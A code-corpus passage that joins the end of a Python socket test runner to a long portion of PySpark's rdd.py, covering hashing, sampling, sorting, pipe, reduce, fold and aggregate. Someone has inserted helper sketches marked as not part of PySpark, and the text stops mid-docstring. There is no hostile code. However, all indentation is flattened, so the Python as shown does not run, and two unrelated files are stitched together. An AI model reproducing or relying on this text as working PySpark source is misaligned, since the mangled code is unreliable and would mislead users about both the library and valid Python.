ThreadedVSOCKSocketStreamTest,
])
tests.extend([
CmsgMacroTests,
SendmsgUDPTest,
RecvmsgUDPTest,
RecvmsgIntoUDPTest,
SendmsgUDP6Test,
RecvmsgUDP6Test,
RecvmsgRFC3542AncillaryUDP6Test,
RecvmsgIntoRFC3542AncillaryUDP6Test,
RecvmsgIntoUDP6Test,
SendmsgUDPLITETest,
RecvmsgUDPLITETest,
RecvmsgIntoUDPLITETest,
SendmsgUDPLITE6Test,
RecvmsgUDPLITE6Test,
RecvmsgRFC3542AncillaryUDPLITE6Test,
RecvmsgIntoRFC3542AncillaryUDPLITE6Test,
RecvmsgIntoUDPLITE6Test,
SendmsgTCPTest,
RecvmsgTCPTest,
RecvmsgIntoTCPTest,
SendmsgSCTPStreamTest,
RecvmsgSCTPStreamTest,
RecvmsgIntoSCTPStreamTest,
SendmsgUnixStreamTest,
RecvmsgUnixStreamTest,
RecvmsgIntoUnixStreamTest,
RecvmsgSCMRightsStreamTest,
RecvmsgIntoSCMRightsStreamTest,
# These are slow when setitimer() is not available
InterruptedRecvTimeoutTest,
InterruptedSendTimeoutTest,
TestSocketSharing,
SendfileUsingSendTest,
SendfileUsingSendfileTest,
])
tests.append(TestMSWindowsTCPFlags)
thread_info = support.threading_setup()
support.run_unittest(*tests)
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
rdd.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
import sys
import os
import re
import operator
import shlex
import warnings
import heapq
import bisect
import random
import socket
from subprocess import Popen, PIPE
from tempfile import NamedTemporaryFile
from threading import Thread
from collections import defaultdict
from itertools import chain
from functools import reduce
from math import sqrt, log, isinf, isnan, pow, ceil
if sys.version > '3':
basestring = unicode = str
else:
from itertools import imap as map, ifilter as filter
from pyspark.serializers import NoOpSerializer, CartesianDeserializer, \
BatchedSerializer, CloudPickleSerializer, PairDeserializer, \
PickleSerializer, pack_long, AutoBatchedSerializer
from pyspark.join import python_join, python_left_outer_join, \
python_right_outer_join, python_full_outer_join, python_cogroup
from pyspark.statcounter import StatCounter
from pyspark.rddsampler import RDDSampler, RDDRangeSampler, RDDStratifiedSampler
from pyspark.storagelevel import StorageLevel
from pyspark.resultiterable import ResultIterable
from pyspark.shuffle import Aggregator, ExternalMerger, \
get_used_memory, ExternalSorter, ExternalGroupBy
from pyspark.traceback_utils import SCCallSiteSync
from py4j.java_collections import ListConverter, MapConverter
__all__ = ["RDD"]
def portable_hash(x):
"""
    This function returns a consistent hash code for builtin types, especially
    for None and for tuples containing None.
    The algorithm is similar to the one used by CPython 2.7
>>> portable_hash(None)
0
>>> portable_hash((None, 1)) & 0xffffffff
219750521
"""
if sys.version >= '3.3' and 'PYTHONHASHSEED' not in os.environ:
raise Exception("Randomness of hash of string should be disabled via PYTHONHASHSEED")
if x is None:
return 0
if isinstance(x, tuple):
h = 0x345678
for i in x:
h ^= portable_hash(i)
h *= 1000003
h &= sys.maxsize
h ^= len(x)
if h == -1:
h = -2
return int(h)
return hash(x)
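# Worked sketch of the tuple branch above (illustrative, not a doctest): for
# x = (None, 1) the loop starts from h = 0x345678 and, for each element,
# computes h = ((h ^ portable_hash(elem)) * 1000003) & sys.maxsize; after the
# loop, len(x) is xor-ed in. The doctest above shows the resulting value
# masked with 0xffffffff.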
class BoundedFloat(float):
"""
    A bounded value generated by an approximate job, with a confidence level
    and low and high bounds.
>>> BoundedFloat(100.0, 0.95, 95.0, 105.0)
100.0
"""
def __new__(cls, mean, confidence, low, high):
obj = float.__new__(cls, mean)
obj.confidence = confidence
obj.low = low
obj.high = high
return obj
def _parse_memory(s):
"""
Parse a memory string in the format supported by Java (e.g. 1g, 200m) and
return the value in MB
>>> _parse_memory("256m")
256
>>> _parse_memory("2g")
2048
"""
units = {'g': 1024, 'm': 1, 't': 1 << 20, 'k': 1.0 / 1024}
if s[-1].lower() not in units:
raise ValueError("invalid format: " + s)
return int(float(s[:-1]) * units[s[-1].lower()])
def _load_from_socket(port, serializer):
sock = None
# Support for both IPv4 and IPv6.
# On most of IPv6-ready systems, IPv6 will take precedence.
for res in socket.getaddrinfo("localhost", port, socket.AF_UNSPEC, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
sock = socket.socket(af, socktype, proto)
try:
sock.settimeout(3)
sock.connect(sa)
except socket.error:
sock.close()
sock = None
continue
break
if not sock:
raise Exception("could not open socket")
try:
rf = sock.makefile("rb", 65536)
for item in serializer.load_stream(rf):
yield item
finally:
sock.close()
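# Illustrative sketch (not part of PySpark): the dual-stack connect loop used by
# _load_from_socket, in isolation. The helper name `_connect_localhost` is
# hypothetical; it only demonstrates the getaddrinfo fallback, trying each
# address family that "localhost" resolves to until one accepts the connection.
def _connect_localhost(port, timeout=3):
    import socket  # repeated locally so the sketch stands alone
    last_error = None
    for af, socktype, proto, _, sa in socket.getaddrinfo(
            "localhost", port, socket.AF_UNSPEC, socket.SOCK_STREAM):
        s = socket.socket(af, socktype, proto)
        try:
            s.settimeout(timeout)
            s.connect(sa)  # first family that answers wins (IPv6 usually comes first)
            return s
        except socket.error as e:
            last_error = e
            s.close()
    raise Exception("could not open socket: %s" % (last_error,))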
def ignore_unicode_prefix(f):
"""
Ignore the 'u' prefix of strings in doctests, so that they work
in both Python 2 and 3.
"""
if sys.version >= '3':
# the representation of a unicode string in Python 3 does not have the prefix 'u',
# so remove the prefix 'u' from doctests
literal_re = re.compile(r"(\W|^)[uU](['])", re.UNICODE)
f.__doc__ = literal_re.sub(r'\1\2', f.__doc__)
return f
class Partitioner(object):
def __init__(self, numPartitions, partitionFunc):
self.numPartitions = numPartitions
self.partitionFunc = partitionFunc
def __eq__(self, other):
return (isinstance(other, Partitioner) and self.numPartitions == other.numPartitions
and self.partitionFunc == other.partitionFunc)
def __call__(self, k):
return self.partitionFunc(k) % self.numPartitions
class RDD(object):
"""
A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
Represents an immutable, partitioned collection of elements that can be
operated on in parallel.
"""
def __init__(self, jrdd, ctx, jrdd_deserializer=AutoBatchedSerializer(PickleSerializer())):
self._jrdd = jrdd
self.is_cached = False
self.is_checkpointed = False
self.ctx = ctx
self._jrdd_deserializer = jrdd_deserializer
self._id = jrdd.id()
self.partitioner = None
def _pickled(self):
return self._reserialize(AutoBatchedSerializer(PickleSerializer()))
def id(self):
"""
A unique ID for this RDD (within its SparkContext).
"""
return self._id
def __repr__(self):
return self._jrdd.toString()
def __getnewargs__(self):
# This method is called when attempting to pickle an RDD, which is always an error:
raise Exception(
"It appears that you are attempting to broadcast an RDD or reference an RDD from an "
"action or transformation. RDD transformations and actions can only be invoked by the "
"driver, not inside of other transformations; for example, "
"rdd1.map(lambda x: rdd2.values.count() * x) is invalid because the values "
"transformation and count action cannot be performed inside of the rdd1.map "
"transformation. For more information, see SPARK-5063."
)
@property
def context(self):
"""
The L{SparkContext} that this RDD was created on.
"""
return self.ctx
def cache(self):
"""
Persist this RDD with the default storage level (C{MEMORY_ONLY_SER}).
"""
self.is_cached = True
self.persist(StorageLevel.MEMORY_ONLY_SER)
return self
def persist(self, storageLevel=StorageLevel.MEMORY_ONLY_SER):
"""
Set this RDD's storage level to persist its values across operations
after the first time it is computed. This can only be used to assign
a new storage level if the RDD does not have a storage level set yet.
If no storage level is specified defaults to (C{MEMORY_ONLY_SER}).
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> rdd.persist().is_cached
True
"""
self.is_cached = True
javaStorageLevel = self.ctx._getJavaStorageLevel(storageLevel)
self._jrdd.persist(javaStorageLevel)
return self
def unpersist(self):
"""
Mark the RDD as non-persistent, and remove all blocks for it from
memory and disk.
"""
self.is_cached = False
self._jrdd.unpersist()
return self
def checkpoint(self):
"""
Mark this RDD for checkpointing. It will be saved to a file inside the
checkpoint directory set with L{SparkContext.setCheckpointDir()} and
all references to its parent RDDs will be removed. This function must
be called before any job has been executed on this RDD. It is strongly
recommended that this RDD is persisted in memory, otherwise saving it
on a file will require recomputation.
"""
self.is_checkpointed = True
self._jrdd.rdd().checkpoint()
def isCheckpointed(self):
"""
Return whether this RDD has been checkpointed or not
"""
return self._jrdd.rdd().isCheckpointed()
def getCheckpointFile(self):
"""
Gets the name of the file to which this RDD was checkpointed
"""
checkpointFile = self._jrdd.rdd().getCheckpointFile()
if checkpointFile.isDefined():
return checkpointFile.get()
def map(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each element of this RDD.
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> sorted(rdd.map(lambda x: (x, 1)).collect())
[('a', 1), ('b', 1), ('c', 1)]
"""
def func(_, iterator):
return map(f, iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def flatMap(self, f, preservesPartitioning=False):
"""
Return a new RDD by first applying a function to all elements of this
RDD, and then flattening the results.
>>> rdd = sc.parallelize([2, 3, 4])
>>> sorted(rdd.flatMap(lambda x: range(1, x)).collect())
[1, 1, 1, 2, 2, 3]
>>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect())
[(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)]
"""
def func(s, iterator):
return chain.from_iterable(map(f, iterator))
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitions(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> def f(iterator): yield sum(iterator)
>>> rdd.mapPartitions(f).collect()
[3, 7]
"""
def func(s, iterator):
return f(iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitionsWithIndex(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithIndex(f).sum()
6
"""
return PipelinedRDD(self, f, preservesPartitioning)
def mapPartitionsWithSplit(self, f, preservesPartitioning=False):
"""
Deprecated: use mapPartitionsWithIndex instead.
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithSplit(f).sum()
6
"""
warnings.warn("mapPartitionsWithSplit is deprecated; "
"use mapPartitionsWithIndex instead", DeprecationWarning, stacklevel=2)
return self.mapPartitionsWithIndex(f, preservesPartitioning)
def getNumPartitions(self):
"""
Returns the number of partitions in this RDD
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> rdd.getNumPartitions()
2
"""
return self._jrdd.partitions().size()
def filter(self, f):
"""
Return a new RDD containing only the elements that satisfy a predicate.
>>> rdd = sc.parallelize([1, 2, 3, 4, 5])
>>> rdd.filter(lambda x: x % 2 == 0).collect()
[2, 4]
"""
def func(iterator):
return filter(f, iterator)
return self.mapPartitions(func, True)
def distinct(self, numPartitions=None):
"""
Return a new RDD containing the distinct elements in this RDD.
>>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect())
[1, 2, 3]
"""
return self.map(lambda x: (x, None)) \
.reduceByKey(lambda x, _: x, numPartitions) \
.map(lambda x: x[0])
def sample(self, withReplacement, fraction, seed=None):
"""
Return a sampled subset of this RDD.
:param withReplacement: can elements be sampled multiple times (replaced when sampled out)
:param fraction: expected size of the sample as a fraction of this RDD's size
without replacement: probability that each element is chosen; fraction must be in [0, 1]
with replacement: expected number of times each element is chosen; fraction must be >= 0
:param seed: seed for the random number generator
>>> rdd = sc.parallelize(range(100), 4)
>>> 6 <= rdd.sample(False, 0.1, 81).count() <= 14
True
"""
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(RDDSampler(withReplacement, fraction, seed).func, True)
def randomSplit(self, weights, seed=None):
"""
Randomly splits this RDD with the provided weights.
:param weights: weights for splits, will be normalized if they don't sum to 1
:param seed: random seed
:return: split RDDs in a list
>>> rdd = sc.parallelize(range(500), 1)
>>> rdd1, rdd2 = rdd.randomSplit([2, 3], 17)
>>> len(rdd1.collect() + rdd2.collect())
500
>>> 150 < rdd1.count() < 250
True
>>> 250 < rdd2.count() < 350
True
"""
s = float(sum(weights))
cweights = [0.0]
for w in weights:
cweights.append(cweights[-1] + w / s)
if seed is None:
seed = random.randint(0, 2 ** 32 - 1)
return [self.mapPartitionsWithIndex(RDDRangeSampler(lb, ub, seed).func, True)
for lb, ub in zip(cweights, cweights[1:])]
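# Illustrative sketch (not part of PySpark): how randomSplit turns the weights
# into the cumulative boundaries handed to each RDDRangeSampler. The helper name
# is hypothetical; with weights [2, 3] the two samplers get roughly 40% and 60%
# of the key space: (0.0, 0.4) and (0.4, 1.0).
def _cumulative_boundaries(weights):
    s = float(sum(weights))
    cweights = [0.0]
    for w in weights:
        cweights.append(cweights[-1] + w / s)
    return list(zip(cweights, cweights[1:]))
# _cumulative_boundaries([2, 3]) -> [(0.0, 0.4), (0.4, 1.0)]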
# this is ported from scala/spark/RDD.scala
def takeSample(self, withReplacement, num, seed=None):
"""
Return a fixed-size sampled subset of this RDD.
>>> rdd = sc.parallelize(range(0, 10))
>>> len(rdd.takeSample(True, 20, 1))
20
>>> len(rdd.takeSample(False, 5, 2))
5
>>> len(rdd.takeSample(False, 15, 3))
10
"""
numStDev = 10.0
if num < 0:
raise ValueError("Sample size cannot be negative.")
elif num == 0:
return []
initialCount = self.count()
if initialCount == 0:
return []
rand = random.Random(seed)
if (not withReplacement) and num >= initialCount:
# shuffle current RDD and return
samples = self.collect()
rand.shuffle(samples)
return samples
maxSampleSize = sys.maxsize - int(numStDev * sqrt(sys.maxsize))
if num > maxSampleSize:
raise ValueError(
"Sample size cannot be greater than %d." % maxSampleSize)
fraction = RDD._computeFractionForSampleSize(
num, initialCount, withReplacement)
samples = self.sample(withReplacement, fraction, seed).collect()
# If the first sample didn't turn out large enough, keep trying to take samples;
# this shouldn't happen often because we use a big multiplier for their initial size.
# See: scala/spark/RDD.scala
while len(samples) < num:
# TODO: add log warning for when more than one iteration was run
seed = rand.randint(0, sys.maxsize)
samples = self.sample(withReplacement, fraction, seed).collect()
rand.shuffle(samples)
return samples[0:num]
@staticmethod
def _computeFractionForSampleSize(sampleSizeLowerBound, total, withReplacement):
"""
Returns a sampling rate that guarantees a sample of
size >= sampleSizeLowerBound 99.99% of the time.
How the sampling rate is determined:
Let p = num / total, where num is the sample size and total is the
total number of data points in the RDD. We're trying to compute
q > p such that
- when sampling with replacement, we're drawing each data point
with prob_i ~ Pois(q), where we want to guarantee
Pr[s < num] < 0.0001 for s = sum(prob_i for i from 0 to
total), i.e. the failure rate of not having a sufficiently large
sample < 0.0001. Setting q = p + 5 * sqrt(p/total) is sufficient
to guarantee 0.9999 success rate for num > 12, but we need a
slightly larger q (9 empirically determined).
- when sampling without replacement, we're drawing each data point
with prob_i ~ Binomial(total, fraction) and our choice of q
guarantees 1-delta, or 0.9999 success rate, where success rate is
defined the same as in sampling with replacement.
"""
fraction = float(sampleSizeLowerBound) / total
if withReplacement:
numStDev = 5
if (sampleSizeLowerBound < 12):
numStDev = 9
return fraction + numStDev * sqrt(fraction / total)
else:
delta = 0.00005
gamma = - log(delta) / total
return min(1, fraction + gamma + sqrt(gamma * gamma + 2 * gamma * fraction))
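# Illustrative sketch (not part of PySpark): plugging example numbers into the
# oversampling formulas documented above. The helper and the numbers are made up:
# for num=100 out of total=10000, p = 0.01; with replacement the rate becomes
# p + 5*sqrt(p/total) ~= 0.0150, and without replacement gamma = -log(5e-5)/total
# ~= 0.00099, so the rate works out to roughly 0.0155.
def _demo_fraction(num, total, with_replacement):
    from math import sqrt, log  # repeated locally so the sketch stands alone
    p = float(num) / total
    if with_replacement:
        num_std_dev = 9 if num < 12 else 5
        return p + num_std_dev * sqrt(p / total)
    delta = 0.00005
    gamma = -log(delta) / total
    return min(1, p + gamma + sqrt(gamma * gamma + 2 * gamma * p))
# _demo_fraction(100, 10000, True)  -> ~0.0150
# _demo_fraction(100, 10000, False) -> ~0.0155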
def union(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> rdd.union(rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if self._jrdd_deserializer == other._jrdd_deserializer:
rdd = RDD(self._jrdd.union(other._jrdd), self.ctx,
self._jrdd_deserializer)
else:
# These RDDs contain data in different serialized formats, so we
# must normalize them to the default serializer.
self_copy = self._reserialize()
other_copy = other._reserialize()
rdd = RDD(self_copy._jrdd.union(other_copy._jrdd), self.ctx,
self.ctx.serializer)
if (self.partitioner == other.partitioner and
self.getNumPartitions() == rdd.getNumPartitions()):
rdd.partitioner = self.partitioner
return rdd
def intersection(self, other):
"""
Return the intersection of this RDD and another one. The output will
not contain any duplicate elements, even if the input RDDs did.
Note that this method performs a shuffle internally.
>>> rdd1 = sc.parallelize([1, 10, 2, 3, 4, 5])
>>> rdd2 = sc.parallelize([1, 6, 2, 3, 7, 8])
>>> rdd1.intersection(rdd2).collect()
[1, 2, 3]
"""
return self.map(lambda v: (v, None)) \
.cogroup(other.map(lambda v: (v, None))) \
.filter(lambda k_vs: all(k_vs[1])) \
.keys()
def _reserialize(self, serializer=None):
serializer = serializer or self.ctx.serializer
if self._jrdd_deserializer != serializer:
self = self.map(lambda x: x, preservesPartitioning=True)
self._jrdd_deserializer = serializer
return self
def __add__(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> (rdd + rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if not isinstance(other, RDD):
raise TypeError
return self.union(other)
def repartitionAndSortWithinPartitions(self, numPartitions=None, partitionFunc=portable_hash,
ascending=True, keyfunc=lambda x: x):
"""
Repartition the RDD according to the given partitioner and, within each resulting partition,
sort records by their keys.
>>> rdd = sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)])
>>> rdd2 = rdd.repartitionAndSortWithinPartitions(2, lambda x: x % 2, 2)
>>> rdd2.glom().collect()
[[(0, 5), (0, 8), (2, 6)], [(1, 3), (3, 8), (3, 8)]]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda k_v: keyfunc(k_v[0]), reverse=(not ascending)))
return self.partitionBy(numPartitions, partitionFunc).mapPartitions(sortPartition, True)
def sortByKey(self, ascending=True, numPartitions=None, keyfunc=lambda x: x):
"""
Sorts this RDD, which is assumed to consist of (key, value) pairs.
# noqa
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortByKey().first()
('1', 3)
>>> sc.parallelize(tmp).sortByKey(True, 1).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortByKey(True, 2).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> tmp2 = [('Mary', 1), ('had', 2), ('a', 3), ('little', 4), ('lamb', 5)]
>>> tmp2.extend([('whose', 6), ('fleece', 7), ('was', 8), ('white', 9)])
>>> sc.parallelize(tmp2).sortByKey(True, 3, keyfunc=lambda k: k.lower()).collect()
[('a', 3), ('fleece', 7), ('had', 2), ('lamb', 5),...('white', 9), ('whose', 6)]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = self._memory_limit()
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda kv: keyfunc(kv[0]), reverse=(not ascending)))
if numPartitions == 1:
if self.getNumPartitions() > 1:
self = self.coalesce(1)
return self.mapPartitions(sortPartition, True)
# first compute the boundary of each part via sampling: we want to partition
# the key-space into bins such that the bins have roughly the same
# number of (key, value) pairs falling into them
rddSize = self.count()
if not rddSize:
return self # empty RDD
maxSampleSize = numPartitions * 20.0 # constant from Spark's RangePartitioner
fraction = min(maxSampleSize / max(rddSize, 1), 1.0)
samples = self.sample(False, fraction, 1).map(lambda kv: kv[0]).collect()
samples = sorted(samples, key=keyfunc)
# we have numPartitions many parts, but one of them has
# an implicit boundary
bounds = [samples[int(len(samples) * (i + 1) / numPartitions)]
for i in range(0, numPartitions - 1)]
def rangePartitioner(k):
p = bisect.bisect_left(bounds, keyfunc(k))
if ascending:
return p
else:
return numPartitions - 1 - p
return self.partitionBy(numPartitions, rangePartitioner).mapPartitions(sortPartition, True)
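# Illustrative sketch (not part of PySpark): the range-boundary step of sortByKey
# above, on plain lists. The helper names are hypothetical; the boundaries are the
# (numPartitions - 1) evenly spaced order statistics of the sorted sample, and
# bisect routes each key to its range, just like rangePartitioner does.
def _range_bounds(sample_keys, num_partitions):
    samples = sorted(sample_keys)
    return [samples[int(len(samples) * (i + 1) / num_partitions)]
            for i in range(num_partitions - 1)]
def _partition_for(key, bounds):
    import bisect  # repeated locally so the sketch stands alone
    return bisect.bisect_left(bounds, key)
# _range_bounds(range(30), 3) -> [10, 20]; _partition_for(15, [10, 20]) -> 1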
def sortBy(self, keyfunc, ascending=True, numPartitions=None):
"""
Sorts this RDD by the given keyfunc
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[0]).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[1]).collect()
[('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
"""
return self.keyBy(keyfunc).sortByKey(ascending, numPartitions).values()
def glom(self):
"""
Return an RDD created by coalescing all elements within each partition
into a list.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> sorted(rdd.glom().collect())
[[1, 2], [3, 4]]
"""
def func(iterator):
yield list(iterator)
return self.mapPartitions(func)
def cartesian(self, other):
"""
Return the Cartesian product of this RDD and another one, that is, the
RDD of all pairs of elements C{(a, b)} where C{a} is in C{self} and
C{b} is in C{other}.
>>> rdd = sc.parallelize([1, 2])
>>> sorted(rdd.cartesian(rdd).collect())
[(1, 1), (1, 2), (2, 1), (2, 2)]
"""
# Due to batching, we can't use the Java cartesian method.
deserializer = CartesianDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(self._jrdd.cartesian(other._jrdd), self.ctx, deserializer)
def groupBy(self, f, numPartitions=None, partitionFunc=portable_hash):
"""
Return an RDD of grouped items.
>>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8])
>>> result = rdd.groupBy(lambda x: x % 2).collect()
>>> sorted([(x, sorted(y)) for (x, y) in result])
[(0, [2, 8]), (1, [1, 1, 3, 5])]
"""
return self.map(lambda x: (f(x), x)).groupByKey(numPartitions, partitionFunc)
@ignore_unicode_prefix
def pipe(self, command, env=None, checkCode=False):
"""
Return an RDD created by piping elements to a forked external process.
>>> sc.parallelize(['1', '2', '', '3']).pipe('cat').collect()
[u'1', u'2', u'', u'3']
:param checkCode: whether or not to check the return value of the shell command.
"""
if env is None:
env = dict()
def func(iterator):
pipe = Popen(
shlex.split(command), env=env, stdin=PIPE, stdout=PIPE)
def pipe_objs(out):
for obj in iterator:
s = str(obj).rstrip('\n') + '\n'
out.write(s.encode('utf-8'))
out.close()
Thread(target=pipe_objs, args=[pipe.stdin]).start()
def check_return_code():
pipe.wait()
if checkCode and pipe.returncode:
raise Exception("Pipe function `%s' exited "
"with error code %d" % (command, pipe.returncode))
else:
for i in range(0):
yield i
return (x.rstrip(b'\n').decode('utf-8') for x in
chain(iter(pipe.stdout.readline, b''), check_return_code()))
return self.mapPartitions(func)
def foreach(self, f):
"""
Applies a function to all elements of this RDD.
>>> def f(x): print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f)
"""
def processPartition(iterator):
for x in iterator:
f(x)
return iter([])
self.mapPartitions(processPartition).count() # Force evaluation
def foreachPartition(self, f):
"""
Applies a function to each partition of this RDD.
>>> def f(iterator):
... for x in iterator:
... print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreachPartition(f)
"""
def func(it):
r = f(it)
try:
return iter(r)
except TypeError:
return iter([])
self.mapPartitions(func).count() # Force evaluation
def collect(self):
"""
Return a list that contains all of the elements in this RDD.
"""
with SCCallSiteSync(self.context) as css:
port = self.ctx._jvm.PythonRDD.collectAndServe(self._jrdd.rdd())
return list(_load_from_socket(port, self._jrdd_deserializer))
def reduce(self, f):
"""
Reduces the elements of this RDD using the specified commutative and
associative binary operator. Currently reduces partitions locally.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add)
15
>>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add)
10
>>> sc.parallelize([]).reduce(add)
Traceback (most recent call last):
...
ValueError: Can not reduce() empty RDD
"""
def func(iterator):
iterator = iter(iterator)
try:
initial = next(iterator)
except StopIteration:
return
yield reduce(f, iterator, initial)
vals = self.mapPartitions(func).collect()
if vals:
return reduce(f, vals)
raise ValueError("Can not reduce() empty RDD")
def treeReduce(self, f, depth=2):
"""
Reduces the elements of this RDD in a multi-level tree pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeReduce(add)
-5
>>> rdd.treeReduce(add, 1)
-5
>>> rdd.treeReduce(add, 2)
-5
>>> rdd.treeReduce(add, 5)
-5
>>> rdd.treeReduce(add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
zeroValue = None, True # Use the second entry to indicate whether this is a dummy value.
def op(x, y):
if x[1]:
return y
elif y[1]:
return x
else:
return f(x[0], y[0]), False
reduced = self.map(lambda x: (x, False)).treeAggregate(zeroValue, op, op, depth)
if reduced[1]:
raise ValueError("Cannot reduce empty RDD.")
return reduced[0]
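# Illustrative sketch (not part of PySpark): the (value, is_dummy) trick above on
# plain data. The helper is hypothetical; folding with the dummy zero lets empty
# "partitions" drop out of the reduction instead of injecting a fake element.
def _demo_tree_reduce(partitions, f):
    from functools import reduce  # repeated locally so the sketch stands alone
    zero = (None, True)
    def op(x, y):
        if x[1]:
            return y
        if y[1]:
            return x
        return (f(x[0], y[0]), False)
    per_part = [reduce(op, [(v, False) for v in part], zero) for part in partitions]
    result = reduce(op, per_part, zero)
    if result[1]:
        raise ValueError("Cannot reduce empty RDD.")
    return result[0]
# _demo_tree_reduce([[1, 2], [], [3]], lambda a, b: a + b) -> 6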
def fold(self, zeroValue, op):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given associative and commutative function and
a neutral "zero value."
The function C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
This behaves somewhat differently from fold operations implemented
for non-distributed collections in functional languages like Scala.
This fold operation may be applied to partitions individually, and then
fold those results into the final result, rather than apply the fold
to each element sequentially in some defined ordering. For functions
that are not commutative, the result may differ from that of a fold
applied to a non-distributed collection.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add)
15
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = op(obj, acc)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(op, vals, zeroValue)
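# Illustrative sketch (not part of PySpark): why the docstring insists on a
# *neutral* zero value. The helper emulates fold over explicit partitions: the
# zero is applied once per partition and once more in the final merge, so a
# non-neutral zero of 1 with addition yields 9 instead of the sequential 7.
def _emulate_fold(partitions, zero, op):
    from functools import reduce  # repeated locally so the sketch stands alone
    per_partition = [reduce(op, part, zero) for part in partitions]
    return reduce(op, per_partition, zero)
# _emulate_fold([[1, 2], [3]], 0, lambda a, b: a + b) -> 6  (neutral zero)
# _emulate_fold([[1, 2], [3]], 1, lambda a, b: a + b) -> 9  (non-neutral zero skews the result)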
def aggregate(self, zeroValue, seqOp, combOp):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given combine functions and a neutral "zero
value."
The functions C{op(t1, t2)} are allowed to modify C{t1} and return it
as the result value to avoid object allocation; however, they should not
modify C{t2}.
The first function (seqOp) can return a different result type, U, than
the type of this RDD. Thus, we need one operation for merging a T into
a U and one operation for merging two U's.
>>> seqOp = (lambda x, y: (x[0] + y, x[1] + 1))
>>> combOp = (lambda x, y: (x[0] + y[0], x[1] + y[1]))
>>> sc.parallelize([1, 2, 3, 4]).aggregate((0, 0), seqOp, combOp)
(10, 4)
>>> sc.parallelize([]).aggregate((0, 0), seqOp, combOp)
(0, 0)
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(combOp, vals, zeroValue)
def treeAggregate(self, zeroValue, seqOp, combOp, depth=2):
"""
Aggregates the elements of this RDD in a multi-level tree
pattern.
